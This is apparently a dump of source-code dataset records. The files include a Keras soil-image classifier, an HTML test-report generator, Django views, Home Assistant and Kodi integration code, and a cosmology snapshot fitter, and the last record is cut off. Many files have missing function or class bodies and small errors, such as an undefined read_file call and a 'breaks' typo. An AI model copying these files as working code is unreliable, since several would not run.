c77641557884ec300d6f17e14694ed49328569cf | 4,930 | py | Python | Image classifier/train.py | anirudha-bs/Farm_assist | f824b7594befdb1132da2a5c03500a1885c6f036 | [
"MIT"
] | null | null | null | Image classifier/train.py | anirudha-bs/Farm_assist | f824b7594befdb1132da2a5c03500a1885c6f036 | [
"MIT"
] | null | null | null | Image classifier/train.py | anirudha-bs/Farm_assist | f824b7594befdb1132da2a5c03500a1885c6f036 | [
"MIT"
] | null | null | null | from __future__ import absolute_import, division, print_function, unicode_literals
import tensorflow as tf
from keras import regularizers
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Conv2D, Flatten, Dropout, MaxPooling2D
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from keras.models import load_model
import numpy as np
from keras.preprocessing.image import img_to_array, load_img
from keras.preprocessing import image
import os
import numpy as np
import matplotlib.pyplot as plt
# defining classes
# Adding dataset paths
PATH = 'new_datasets'
train_dir = os.path.join(PATH, 'train')
validation_dir = os.path.join(PATH, 'validation')
test_dir = os.path.join(PATH, 'test')
train_red_dir = os.path.join(train_dir, 'Red_soil')
validation_red_dir = os.path.join(validation_dir, 'Red_soil')
train_black_dir = os.path.join(train_dir, 'Black_soil')
validation_black_dir = os.path.join(validation_dir, 'Black_soil')
train_all_dir = os.path.join(train_dir, 'Alluvial_soil')
validation_all_dir = os.path.join(validation_dir, 'Alluvial_soil')
num_soil_tr = len(os.listdir(train_red_dir)) + len(os.listdir(train_black_dir)) +len(os.listdir(train_all_dir))
num_soil_val = len(os.listdir(validation_red_dir)) + len(os.listdir(validation_black_dir)) + len((os.listdir(validation_all_dir)))
print("Total training images = ",num_soil_tr)
print("Total validation images = ",num_soil_val)
# hyperparameters
batch_size = 100
epochs = 15
IMG_HEIGHT = 128
IMG_WIDTH = 128
classes_num=3
# data generators
train_image_generator = ImageDataGenerator(rescale=1./255)
validation_image_generator = ImageDataGenerator(rescale=1./255)
train_data_gen = train_image_generator.flow_from_directory(batch_size=batch_size,
directory=train_dir,
shuffle=True,
target_size=(IMG_HEIGHT, IMG_WIDTH),
class_mode='categorical')
val_data_gen = validation_image_generator.flow_from_directory(batch_size=batch_size,
directory=validation_dir,
target_size=(IMG_HEIGHT, IMG_WIDTH),
shuffle=True,
class_mode='categorical')
# defining the model
model = Sequential([
Conv2D(16, 5, activation='relu', input_shape=(IMG_HEIGHT, IMG_WIDTH ,3)),
MaxPooling2D(pool_size=(3, 3)),
Dropout(0.2),
Conv2D(32, 5, activation='relu'),
MaxPooling2D(pool_size=(3, 3)),
Dropout(0.2),
Conv2D(64, 5, activation='relu'),
MaxPooling2D(pool_size=(3, 3)),
Dropout(0.3),
Flatten(),
Dense(32, activation='relu'),
Dense(classes_num, activation='softmax')
])
model.compile(optimizer='adam',
loss='binary_crossentropy',
metrics=['accuracy'])
model.summary()
history = model.fit_generator(
train_data_gen,
steps_per_epoch= num_soil_tr// batch_size,
epochs=epochs,
validation_data=val_data_gen,
validation_steps=num_soil_val // batch_size
)
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs_range = range(epochs)
# training and validation graphs
plt.figure(figsize=(8, 8))
plt.subplot(1, 2, 1)
plt.plot(epochs_range, acc, label='Training Accuracy')
plt.plot(epochs_range, val_acc, label='Validation Accuracy')
plt.legend(loc='lower right')
plt.title('Training and Validation Accuracy')
plt.subplot(1, 2, 2)
plt.plot(epochs_range, loss, label='Training Loss')
plt.plot(epochs_range, val_loss, label='Validation Loss')
plt.legend(loc='upper right')
plt.title('Training and Validation Loss')
plt.show()
model.save('new_soil_classify.h5')
# for testing trained model with images differnent class
image_path="red.jpg"
img = image.load_img(image_path, target_size=(IMG_HEIGHT, IMG_WIDTH))
plt.imshow(img)
img = np.expand_dims(img, axis=0)
result=model.predict_classes(img)
plt.title(result[0])
plt.show()
image_path1="black.jpg"
img1 = image.load_img(image_path1, target_size=(IMG_HEIGHT, IMG_WIDTH))
plt.imshow(img1)
img1 = np.expand_dims(img1, axis=0)
result=model.predict_classes(img1)
plt.title(result[0])
plt.show()
image_path="all.jpg"
img = image.load_img(image_path, target_size=(IMG_HEIGHT, IMG_WIDTH))
plt.imshow(img)
img = np.expand_dims(img, axis=0)
result=model.predict_classes(img)
plt.title(result[0])
plt.show()
| 29.878788 | 130 | 0.683773 |
c779118332635de2c8ae2f98f07d435f86ed8e76 | 2,361 | py | Python | fastrunner/httprunner3/report/html/gen_report.py | Chankee/AutoTestRunner | 5f329b0dfac91ccd3541aabf46cc997cc4f01da3 | [
"MIT"
] | 1 | 2020-04-30T08:41:19.000Z | 2020-04-30T08:41:19.000Z | httprunner/report/html/gen_report.py | Barronliu/httprunner | 463b8c68cbd413fd2bb66852752149bc1609e98d | [
"Apache-2.0"
] | null | null | null | httprunner/report/html/gen_report.py | Barronliu/httprunner | 463b8c68cbd413fd2bb66852752149bc1609e98d | [
"Apache-2.0"
] | null | null | null | import io
import os
from datetime import datetime
from jinja2 import Template
from loguru import logger
from httprunner.exceptions import SummaryEmpty
def gen_html_report(summary, report_template=None, report_dir=None, report_file=None):
""" render html report with specified report name and template
Args:
summary (dict): test result summary data
report_template (str): specify html report template path, template should be in Jinja2 format.
report_dir (str): specify html report save directory
report_file (str): specify html report file path, this has higher priority than specifying report dir.
"""
if not summary["time"] or summary["stat"]["testcases"]["total"] == 0:
logger.error(f"test result summary is empty ! {summary}")
raise SummaryEmpty
if not report_template:
report_template = os.path.join(
os.path.abspath(os.path.dirname(__file__)),
"template.html"
)
logger.debug("No html report template specified, use default.")
else:
logger.info(f"render with html report template: {report_template}")
logger.info("Start to render Html report ...")
start_at_timestamp = summary["time"]["start_at"]
utc_time_iso_8601_str = datetime.utcfromtimestamp(start_at_timestamp).isoformat()
summary["time"]["start_datetime"] = utc_time_iso_8601_str
if report_file:
report_dir = os.path.dirname(report_file)
report_file_name = os.path.basename(report_file)
else:
report_dir = report_dir or os.path.join(os.getcwd(), "reports")
# fix #826: Windows does not support file name include ":"
report_file_name = "{}.html".format(utc_time_iso_8601_str.replace(":", "").replace("-", ""))
if not os.path.isdir(report_dir):
os.makedirs(report_dir)
report_path = os.path.join(report_dir, report_file_name)
with io.open(report_template, "r", encoding='utf-8') as fp_r:
template_content = fp_r.read()
with io.open(report_path, 'w', encoding='utf-8') as fp_w:
rendered_content = Template(
template_content,
extensions=["jinja2.ext.loopcontrols"]
).render(summary)
fp_w.write(rendered_content)
logger.info(f"Generated Html report: {report_path}")
return report_path
| 36.323077 | 110 | 0.674714 |
c779400f9f454e7ffcd25d7cea5b32ebe4fe996a | 730 | py | Python | SD/lab1/client.py | matheuscr30/UFU | e947e5a4ccd5c025cb8ef6e00b42ea1160742712 | [
"MIT"
] | null | null | null | SD/lab1/client.py | matheuscr30/UFU | e947e5a4ccd5c025cb8ef6e00b42ea1160742712 | [
"MIT"
] | 11 | 2020-01-28T22:59:24.000Z | 2022-03-11T23:59:04.000Z | SD/lab1/client.py | matheuscr30/UFU | e947e5a4ccd5c025cb8ef6e00b42ea1160742712 | [
"MIT"
] | null | null | null | #client.py
#!/usr/bin/python # This is client.py file
import socket # Import socket module
s = socket.socket() # Create a socket object
host = socket.gethostname() # Get local machine name
port = 12352 # Reserve a port for your service.
s.connect((host, port))
while True:
message = input('Digite mensagem: ')
s.send(bytes(message, encoding='utf8'))
if message == 'SAIR':
breaks
print('Mensagem enviada.')
print('Esperando resposta.')
answer = s.recv(1024).decode('utf8')
print('Resposta recebida: ' + answer)
print('Desconectando.')
s.close()
| 27.037037 | 82 | 0.536986 |
c77943cb74b84356ac52ea818e7a35cca299778c | 4,040 | py | Python | tests/helpers.py | ws4/TopCTFd | 3b1e25df1318e86ff163a0b546f6e9b7f8305a5a | [
"Apache-2.0"
] | 1 | 2019-06-25T09:24:29.000Z | 2019-06-25T09:24:29.000Z | tests/helpers.py | ws4/TopCTFd | 3b1e25df1318e86ff163a0b546f6e9b7f8305a5a | [
"Apache-2.0"
] | null | null | null | tests/helpers.py | ws4/TopCTFd | 3b1e25df1318e86ff163a0b546f6e9b7f8305a5a | [
"Apache-2.0"
] | null | null | null | from CTFd import create_app
from CTFd.models import *
from sqlalchemy_utils import database_exists, create_database, drop_database
from sqlalchemy.engine.url import make_url
import datetime
import six
if six.PY2:
text_type = unicode
binary_type = str
else:
text_type = str
binary_type = bytes
| 27.297297 | 117 | 0.592574 |
c77b3c34564c716c04ed2a2e2297c397f73e511f | 1,741 | py | Python | homeassistant/components/kaiterra/const.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 30,023 | 2016-04-13T10:17:53.000Z | 2020-03-02T12:56:31.000Z | homeassistant/components/kaiterra/const.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 24,710 | 2016-04-13T08:27:26.000Z | 2020-03-02T12:59:13.000Z | homeassistant/components/kaiterra/const.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 11,956 | 2016-04-13T18:42:31.000Z | 2020-03-02T09:32:12.000Z | """Consts for Kaiterra integration."""
from datetime import timedelta
from homeassistant.const import (
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_MILLIGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_BILLION,
CONCENTRATION_PARTS_PER_MILLION,
PERCENTAGE,
Platform,
)
# Integration identity and the dispatcher signal used to push device updates.
DOMAIN = "kaiterra"
DISPATCHER_KAITERRA = "kaiterra_update"
# AQI breakpoint thresholds per supported standard ("cn", "in", "us").
# Each list is one entry longer than the matching AQI_LEVEL list so that
# consecutive pairs bound one named level.
AQI_SCALE = {
    "cn": [0, 50, 100, 150, 200, 300, 400, 500],
    "in": [0, 50, 100, 200, 300, 400, 500],
    "us": [0, 50, 100, 150, 200, 300, 500],
}
# Human-readable level names for each AQI standard, ordered from best to worst.
AQI_LEVEL = {
    "cn": [
        "Good",
        "Satisfactory",
        "Moderate",
        "Unhealthy for sensitive groups",
        "Unhealthy",
        "Very unhealthy",
        "Hazardous",
    ],
    "in": [
        "Good",
        "Satisfactory",
        "Moderately polluted",
        "Poor",
        "Very poor",
        "Severe",
    ],
    "us": [
        "Good",
        "Moderate",
        "Unhealthy for sensitive groups",
        "Unhealthy",
        "Very unhealthy",
        "Hazardous",
    ],
}
# Extra state-attribute keys exposed on the entities.
ATTR_VOC = "volatile_organic_compounds"
ATTR_AQI_LEVEL = "air_quality_index_level"
ATTR_AQI_POLLUTANT = "air_quality_index_pollutant"
# Accepted values for the configuration options below.
AVAILABLE_AQI_STANDARDS = ["us", "cn", "in"]
AVAILABLE_UNITS = [
    "x",
    PERCENTAGE,
    "C",
    "F",
    CONCENTRATION_MILLIGRAMS_PER_CUBIC_METER,
    CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
    CONCENTRATION_PARTS_PER_MILLION,
    CONCENTRATION_PARTS_PER_BILLION,
]
AVAILABLE_DEVICE_TYPES = ["laseregg", "sensedge"]
# Configuration keys and their defaults.
CONF_AQI_STANDARD = "aqi_standard"
CONF_PREFERRED_UNITS = "preferred_units"
DEFAULT_AQI_STANDARD = "us"
DEFAULT_PREFERRED_UNIT: list[str] = []
DEFAULT_SCAN_INTERVAL = timedelta(seconds=30)
PLATFORMS = [Platform.SENSOR, Platform.AIR_QUALITY]
| 22.907895 | 51 | 0.649627 |
c77bfcd69447b6d8753b518a3930aaea586d8856 | 440 | py | Python | support/views.py | bhagirath1312/ich_bau | d37fe7aa3379f312a4d8b5f3d4715dd334b9adb0 | [
"Apache-2.0"
] | 1 | 2021-11-25T19:37:01.000Z | 2021-11-25T19:37:01.000Z | support/views.py | bhagirath1312/ich_bau | d37fe7aa3379f312a4d8b5f3d4715dd334b9adb0 | [
"Apache-2.0"
] | 197 | 2017-09-06T22:54:20.000Z | 2022-02-05T00:04:13.000Z | support/views.py | bhagirath1312/ich_bau | d37fe7aa3379f312a4d8b5f3d4715dd334b9adb0 | [
"Apache-2.0"
] | 2 | 2017-11-08T02:13:03.000Z | 2020-09-30T19:48:12.000Z | from django.shortcuts import render, redirect
from django.http import HttpResponseRedirect
from .models import SupportProject
# Create your views here.
| 27.5 | 76 | 0.688636 |
c77bfffe662ca6c238ec477ceec482de486d7271 | 2,931 | py | Python | timeline/models.py | KolibriSolutions/BepMarketplace | c47d252fd744cde6b927e37c34d7a103c6162be5 | [
"BSD-3-Clause"
] | 1 | 2019-06-29T15:24:24.000Z | 2019-06-29T15:24:24.000Z | timeline/models.py | KolibriSolutions/BepMarketplace | c47d252fd744cde6b927e37c34d7a103c6162be5 | [
"BSD-3-Clause"
] | 2 | 2020-01-12T17:47:33.000Z | 2020-01-12T17:47:45.000Z | timeline/models.py | KolibriSolutions/BepMarketplace | c47d252fd744cde6b927e37c34d7a103c6162be5 | [
"BSD-3-Clause"
] | 2 | 2019-06-29T15:24:26.000Z | 2020-01-08T15:15:03.000Z | # Bep Marketplace ELE
# Copyright (c) 2016-2021 Kolibri Solutions
# License: See LICENSE file or https://github.com/KolibriSolutions/BepMarketplace/blob/master/LICENSE
#
from datetime import datetime
from django.core.exceptions import ValidationError
from django.db import models
| 38.565789 | 119 | 0.643125 |
c77d8ee927213d5c37d334a8dc0c0e3d7493a2cf | 2,221 | py | Python | app/api/user_routes.py | nappernick/envelope | af4f574c04c51293b90ee2e09d0f95d12ca36d2c | [
"MIT"
] | 2 | 2021-01-13T22:52:16.000Z | 2021-01-29T18:37:51.000Z | app/api/user_routes.py | nappernick/envelope | af4f574c04c51293b90ee2e09d0f95d12ca36d2c | [
"MIT"
] | 32 | 2021-01-08T19:05:33.000Z | 2021-04-07T22:01:54.000Z | app/api/user_routes.py | nappernick/envelope | af4f574c04c51293b90ee2e09d0f95d12ca36d2c | [
"MIT"
] | null | null | null | from datetime import datetime
from werkzeug.security import generate_password_hash
from flask import Blueprint, jsonify, request
from sqlalchemy.orm import joinedload
from flask_login import login_required
from app.models import db, User, Type
from app.forms import UpdateUserForm
from .auth_routes import authenticate, validation_errors_to_error_messages
user_routes = Blueprint('users', __name__)
| 30.013514 | 74 | 0.692031 |
c77e4ddc9f8fe255a8511d43e707cc1ce8c44d20 | 19,717 | py | Python | timeflux/nodes/ml.py | OpenMindInnovation/timeflux | fd27ea6706df80fa52fb73ea3dba65e14ccd088c | [
"MIT"
] | null | null | null | timeflux/nodes/ml.py | OpenMindInnovation/timeflux | fd27ea6706df80fa52fb73ea3dba65e14ccd088c | [
"MIT"
] | null | null | null | timeflux/nodes/ml.py | OpenMindInnovation/timeflux | fd27ea6706df80fa52fb73ea3dba65e14ccd088c | [
"MIT"
] | null | null | null | """Machine Learning"""
import importlib
import numpy as np
import pandas as pd
import json
from jsonschema import validate
from sklearn.pipeline import make_pipeline
from timeflux.core.node import Node
from timeflux.core.exceptions import ValidationError, WorkerInterrupt
from timeflux.helpers.background import Task
from timeflux.helpers.port import make_event, match_events, get_meta
from timeflux.helpers.clock import now, min_time, max_time
# Statuses
# Integer status codes; presumably they track the model life-cycle
# (idle -> accumulating training data -> fitting -> ready) — confirm
# against the node implementation that consumes them.
IDLE = 0
ACCUMULATING = 1
FITTING = 2
READY = 3
| 39.121032 | 103 | 0.502054 |
c780e591cbad3129663e73ce7d7f50fa3fb44f8f | 3,675 | py | Python | cms/migrations/0006_auto_20170122_1545.py | josemlp91/django-landingcms | 9d9270204369e9663ff15eb0bd4c4093b3727c6c | [
"Apache-2.0"
] | null | null | null | cms/migrations/0006_auto_20170122_1545.py | josemlp91/django-landingcms | 9d9270204369e9663ff15eb0bd4c4093b3727c6c | [
"Apache-2.0"
] | null | null | null | cms/migrations/0006_auto_20170122_1545.py | josemlp91/django-landingcms | 9d9270204369e9663ff15eb0bd4c4093b3727c6c | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-22 15:45
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
| 47.115385 | 164 | 0.653605 |
c781463cac684dcc8d5bd7e224347018ce45563c | 3,641 | py | Python | 1-lab-lambdaDynamoDB/source/cdk/app.py | donnieprakoso/workshop-buildingRESTAPIwithAWS | b3287d5749b65648710dde4e736ba55b73371c6b | [
"Apache-2.0"
] | 23 | 2021-04-24T06:32:58.000Z | 2022-03-27T11:04:57.000Z | 1-lab-lambdaDynamoDB/source/cdk/app.py | ivandi1980/workshop-restAPI | b3287d5749b65648710dde4e736ba55b73371c6b | [
"Apache-2.0"
] | null | null | null | 1-lab-lambdaDynamoDB/source/cdk/app.py | ivandi1980/workshop-restAPI | b3287d5749b65648710dde4e736ba55b73371c6b | [
"Apache-2.0"
] | 5 | 2021-04-24T12:10:02.000Z | 2021-11-18T13:34:33.000Z | #!/usr/bin/env python3
from aws_cdk import aws_iam as _iam
from aws_cdk import aws_lambda as _lambda
from aws_cdk import aws_dynamodb as _ddb
from aws_cdk import core
stack_prefix='restAPI-lab1-lambdaDynamoDB'
app = core.App()
stack = CdkStack(app, stack_prefix, stack_prefix=stack_prefix)
core.Tags.of(stack).add('Name',stack_prefix)
app.synth()
| 44.950617 | 177 | 0.682505 |
c7821ff30782af7bc27dc24920e0c07f5856c1a5 | 326 | py | Python | module_6_lets_make_a_web_app/webapp/yield.py | JCarlos831/python_getting_started_-pluralsight- | 5059a1019c46eb8174fc86989fab7cc0c4caffd4 | [
"MIT"
] | null | null | null | module_6_lets_make_a_web_app/webapp/yield.py | JCarlos831/python_getting_started_-pluralsight- | 5059a1019c46eb8174fc86989fab7cc0c4caffd4 | [
"MIT"
] | null | null | null | module_6_lets_make_a_web_app/webapp/yield.py | JCarlos831/python_getting_started_-pluralsight- | 5059a1019c46eb8174fc86989fab7cc0c4caffd4 | [
"MIT"
] | null | null | null | students = []
read_file()
print(students) | 16.3 | 40 | 0.57362 |
c782a4a5ddbb4061270df891d7584a13d55d2191 | 6,325 | py | Python | paul_analysis/Python/labird/gamma.py | lzkelley/arepo-mbh-sims_analysis | f14519552cedd39a040b53e6d7cc538b5b8f38a3 | [
"MIT"
] | null | null | null | paul_analysis/Python/labird/gamma.py | lzkelley/arepo-mbh-sims_analysis | f14519552cedd39a040b53e6d7cc538b5b8f38a3 | [
"MIT"
] | null | null | null | paul_analysis/Python/labird/gamma.py | lzkelley/arepo-mbh-sims_analysis | f14519552cedd39a040b53e6d7cc538b5b8f38a3 | [
"MIT"
] | null | null | null | """Module for finding an effective equation of state for in the Lyman-alpha forest
from a snapshot. Ported to python from Matteo Viel's IDL script."""
import h5py
import math
import numpy as np
def read_gamma(num,base):
"""Reads in an HDF5 snapshot from the NE gadget version, fits a power law to the
equation of state for low density, low temperature gas.
Inputs:
num - snapshot number
base - Snapshot directory
Outputs:
(T_0, \gamma) - Effective equation of state parameters
"""
# Baryon density parameter
omegab0 = 0.0449
singlefile=False
#base="/home/spb41/data2/runs/bf2/"
snap=str(num).rjust(3,'0')
fname=base+"/snapdir_"+snap+"/snap_"+snap
try:
f=h5py.File(fname+".0.hdf5",'r')
except IOError:
fname=base+"/snap_"+snap
f=h5py.File(fname+".hdf5",'r')
singlefile=True
print 'Reading file from:',fname
head=f["Header"].attrs
npart=head["NumPart_ThisFile"]
redshift=head["Redshift"]
print "z=",redshift
atime=head["Time"]
h100=head["HubbleParam"]
if npart[0] == 0 :
print "No gas particles!\n"
return
f.close()
# Scaling factors and constants
Xh = 0.76 # Hydrogen fraction
G = 6.672e-11 # N m^2 kg^-2
kB = 1.3806e-23 # J K^-1
Mpc = 3.0856e22 # m
kpc = 3.0856e19 # m
Msun = 1.989e30 # kg
mH = 1.672e-27 # kg
H0 = 1.e5/Mpc # 100 km s^-1 Mpc^-1 in SI units
gamma = 5.0/3.0
rscale = (kpc * atime)/h100 # convert length to m
#vscale = atime**0.5 # convert velocity to km s^-1
mscale = (1e10 * Msun)/h100 # convert mass to kg
dscale = mscale / (rscale**3.0) # convert density to kg m^-3
escale = 1e6 # convert energy/unit mass to J kg^-1
N = 0
sx = 0
sy = 0
sxx = 0
sxy = 0
met = 0
carb = 0
oxy = 0
totmass=0
totigmmass=0
totmet = 0
sxxm = 0
sxym = 0
sxm = 0
sym = 0
for i in np.arange(0,500) :
ffname=fname+"."+str(i)+".hdf5"
if singlefile:
ffname=fname+".hdf5"
if i > 0:
break
#print 'Reading file ',ffname
try:
f=h5py.File(ffname,'r')
except IOError:
break
head=f["Header"].attrs
npart=head["NumPart_ThisFile"]
if npart[0] == 0 :
print "No gas particles in file ",i,"!\n"
break
bar = f["PartType0"]
u=np.array(bar['InternalEnergy'],dtype=np.float64)
rho=np.array(bar['Density'],dtype=np.float64)
nelec=np.array(bar['ElectronAbundance'],dtype=np.float64)
metalic = np.array(bar['GFM_Metallicity'],dtype=np.float64)
metals = np.array(bar['GFM_Metals'],dtype=np.float64)
mass = np.array(bar['Masses'], dtype=np.float64)
#nH0=np.array(bar['NeutralHydrogenAbundance'])
f.close()
# Convert to physical SI units. Only energy and density considered here.
rho *= dscale # kg m^-3, ,physical
u *= escale # J kg^-1
## Mean molecular weight
mu = 1.0 / ((Xh * (0.75 + nelec)) + 0.25)
#temp = mu/kB * (gamma-1) * u * mH
#templog = alog10(temp)
templog=np.log10(mu/kB * (gamma-1) * u * mH)
##### Critical matter/energy density at z=0.0
rhoc = 3 * (H0*h100)**2 / (8. * math.pi * G) # kg m^-3
##### Mean hydrogen density of the Universe
nHc = rhoc /mH * omegab0 *Xh * (1.+redshift)**3.0
##### Physical hydrogen number density
#nH = rho * Xh / mH
### Hydrogen density as a fraction of the mean hydrogen density
overden = np.log10(rho*Xh/mH / nHc)
### Calculates average/median temperature in a given overdensity range#
#overden = rho/(rhoc *omegab)
#ind = where(overden ge -0.01 and overden le 0.01)
#avgT0 = mean(temp(ind))
#medT0 = median(temp(ind))
#loT0 = min(temp(ind))
#hiT0 = max(temp(ind))
#
#avgnH1 = mean(nH0(ind))
#mednH1 = median(nH0(ind))
#lonH1 = min(nH0(ind))
#hinH1 = max(nH0(ind))
#
#print,''
#print,'Temperature (K) at mean cosmic density'
#print,'Average temperature [K,log]:',avgT0,alog10(avgT0)
#print,'Median temperature [K,log]:',medT0,alog10(medT0)
#print,'Maximum temperature [K,log]:',hiT0,alog10(hiT0)
#print,'Minimum temperature [K,log]:',loT0,alog10(loT0)
#
#print
#print,'nH1/nH at mean cosmic density'
#print,'Mean log H1 abundance [nH1/nH,log]:',avgnH1,alog10(avgnH1)
#print,'Median log H1 abundance [nH1/nH,log]:',mednH1,alog10(mednH1)
#print,'Maximum log H1 abundance [nH1/nH,log]:',hinH1,alog10(hinH1)
#print,'Minimum log H1 abundance [nH1/nH,log]:',lonH1,alog10(lonH1)
#print
#
ind2 = np.where((overden > 0) * (overden < 1.5) )
tempfit = templog[ind2]
overdenfit = overden[ind2]
N += np.size(ind2)
#print, "Number of fitting points for equation of state", N
indm = np.where(metals < 1e-10)
metals[indm] = 1e-10
sx += np.sum(overdenfit)
sy += np.sum(tempfit)
sxx += np.sum(overdenfit*overdenfit)
sxy += np.sum(overdenfit*tempfit)
met += np.sum(mass[ind2]*metalic[ind2])
carb += np.sum(mass[ind2]*metals[ind2,2])
oxy += np.sum(mass[ind2]*metals[ind2,4])
totmet += np.sum(mass*metalic)
totmass += np.sum(mass)
totigmmass += np.sum(mass[ind2])
sym += np.sum(np.log10(metals[ind2,2]))
sxym += np.sum(overdenfit*np.log10(metals[ind2,2]))
# log T = log(T_0) + (gamma-1) log(rho/rho_0)
# and use least squares fit.
delta = (N*sxx)-(sx*sx)
a = ((sxx*sy) - (sx*sxy))/delta
b = ((N*sxy) - (sx*sy))/delta
amet = ((sxx*sym) - (sx*sxym))/delta
bmet = ((N*sxym) - (sx*sym))/delta
print num,": gamma", b+1.0," log(T0)", a," T0 (K)", (10.0)**a, "Metallicity: ", met/totigmmass,totmet/totmass, "[C/H,O/H]: ",carb/totigmmass, oxy/totigmmass,"(a_Z, b_Z): ",10**amet, bmet
raise Exception
return (redshift,10.0**a, b+1)
| 32.772021 | 192 | 0.552727 |
c782edc67d9a2546d01dc48945d663005d17b20d | 10,490 | py | Python | evogym/envs/change_shape.py | federico-camerota/evogym | fb3a792f93a61be15c9715a036da3721f99d2d42 | [
"MIT"
] | 78 | 2022-01-30T18:59:39.000Z | 2022-03-31T00:26:41.000Z | evogym/envs/change_shape.py | Yuxing-Wang-THU/evogym | da3a0508fa6c5d3fcf589194778844b15a387ece | [
"MIT"
] | 6 | 2022-01-31T02:37:49.000Z | 2022-03-30T18:52:13.000Z | evogym/envs/change_shape.py | Yuxing-Wang-THU/evogym | da3a0508fa6c5d3fcf589194778844b15a387ece | [
"MIT"
] | 6 | 2022-01-31T08:11:33.000Z | 2022-02-22T01:49:50.000Z | import gym
from gym import error, spaces
from gym import utils
from gym.utils import seeding
from evogym import *
from evogym.envs import BenchmarkBase
import random
from math import *
import numpy as np
import os
| 33.196203 | 121 | 0.6102 |
c7852c56539dc442622c1969bd3081ad523df76c | 29,214 | py | Python | pybind/slxos/v16r_1_00b/mpls_state/ldp/fec/ldp_fec_prefixes/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/mpls_state/ldp/fec/ldp_fec_prefixes/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/mpls_state/ldp/fec/ldp_fec_prefixes/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | 1 | 2021-11-05T22:15:42.000Z | 2021-11-05T22:15:42.000Z |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import prefix
import key
| 73.772727 | 744 | 0.742726 |
c78545f3c73bfddebce8e778857a5662b6cdc383 | 610 | py | Python | pug/dj/miner/model_mixin.py | hobson/pug-dj | 55678b08755a55366ce18e7d3b8ea8fa4491ab04 | [
"MIT"
] | null | null | null | pug/dj/miner/model_mixin.py | hobson/pug-dj | 55678b08755a55366ce18e7d3b8ea8fa4491ab04 | [
"MIT"
] | 5 | 2021-09-07T23:53:24.000Z | 2022-03-11T23:22:04.000Z | pug/dj/miner/model_mixin.py | hobson/pug-dj | 55678b08755a55366ce18e7d3b8ea8fa4491ab04 | [
"MIT"
] | 1 | 2015-04-23T14:45:04.000Z | 2015-04-23T14:45:04.000Z | from pug.nlp.db import representation
from django.db import models
| 32.105263 | 150 | 0.727869 |
c785e70d66977d68cd692ad4e28b80dae9e1f5c0 | 4,255 | py | Python | custom_components/kodi_media_sensors/config_flow.py | JurajNyiri/kodi-media-sensors | 055065e52b34555df95a905fc556d3086626deee | [
"MIT"
] | 5 | 2021-03-20T23:32:58.000Z | 2022-03-12T02:01:39.000Z | custom_components/kodi_media_sensors/config_flow.py | JurajNyiri/kodi-media-sensors | 055065e52b34555df95a905fc556d3086626deee | [
"MIT"
] | 11 | 2021-02-09T16:40:34.000Z | 2022-03-20T11:43:06.000Z | custom_components/kodi_media_sensors/config_flow.py | JurajNyiri/kodi-media-sensors | 055065e52b34555df95a905fc556d3086626deee | [
"MIT"
] | 3 | 2021-02-09T17:01:25.000Z | 2022-02-23T22:21:16.000Z | import logging
from typing import Any, Dict, Optional
from homeassistant import config_entries
from homeassistant.components.kodi.const import DOMAIN as KODI_DOMAIN
from homeassistant.core import callback
import voluptuous as vol
from .const import (
OPTION_HIDE_WATCHED,
OPTION_USE_AUTH_URL,
OPTION_SEARCH_LIMIT,
OPTION_SEARCH_LIMIT_DEFAULT_VALUE,
CONF_KODI_INSTANCE,
DOMAIN,
CONF_SENSOR_RECENTLY_ADDED_TVSHOW,
CONF_SENSOR_RECENTLY_ADDED_MOVIE,
CONF_SENSOR_PLAYLIST,
CONF_SENSOR_SEARCH,
)
_LOGGER = logging.getLogger(__name__)
| 36.681034 | 88 | 0.624207 |
c785fce89075a58bb84f43684cf4f43e70fff95c | 3,561 | py | Python | MySite/MainApp/views.py | tananyan/siteee | f90c4ed56122d1af2f3795a0f16c3f294b785ad3 | [
"MIT"
] | 1 | 2021-11-29T14:50:09.000Z | 2021-11-29T14:50:09.000Z | MySite/MainApp/views.py | tananyan/siteee | f90c4ed56122d1af2f3795a0f16c3f294b785ad3 | [
"MIT"
] | null | null | null | MySite/MainApp/views.py | tananyan/siteee | f90c4ed56122d1af2f3795a0f16c3f294b785ad3 | [
"MIT"
] | null | null | null | from django.shortcuts import render
from django.views.generic.edit import FormView
from django.views.generic.edit import View
from . import forms
# , django .
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import logout
from django.http import HttpResponseRedirect
from django.contrib.auth import login
| 33.914286 | 134 | 0.686043 |
c787795efbca79aae84c0943ac98820495ba5ee9 | 4,057 | py | Python | imagetagger/imagetagger/settings_base.py | jbargu/imagetagger | 216ac5e73902abadc1880321e285e68c55bdfd3d | [
"MIT"
] | 1 | 2019-12-26T09:14:59.000Z | 2019-12-26T09:14:59.000Z | imagetagger/imagetagger/settings_base.py | jbargu/imagetagger | 216ac5e73902abadc1880321e285e68c55bdfd3d | [
"MIT"
] | 4 | 2021-03-19T15:46:34.000Z | 2022-01-13T03:33:04.000Z | imagetagger/imagetagger/settings_base.py | jbargu/imagetagger | 216ac5e73902abadc1880321e285e68c55bdfd3d | [
"MIT"
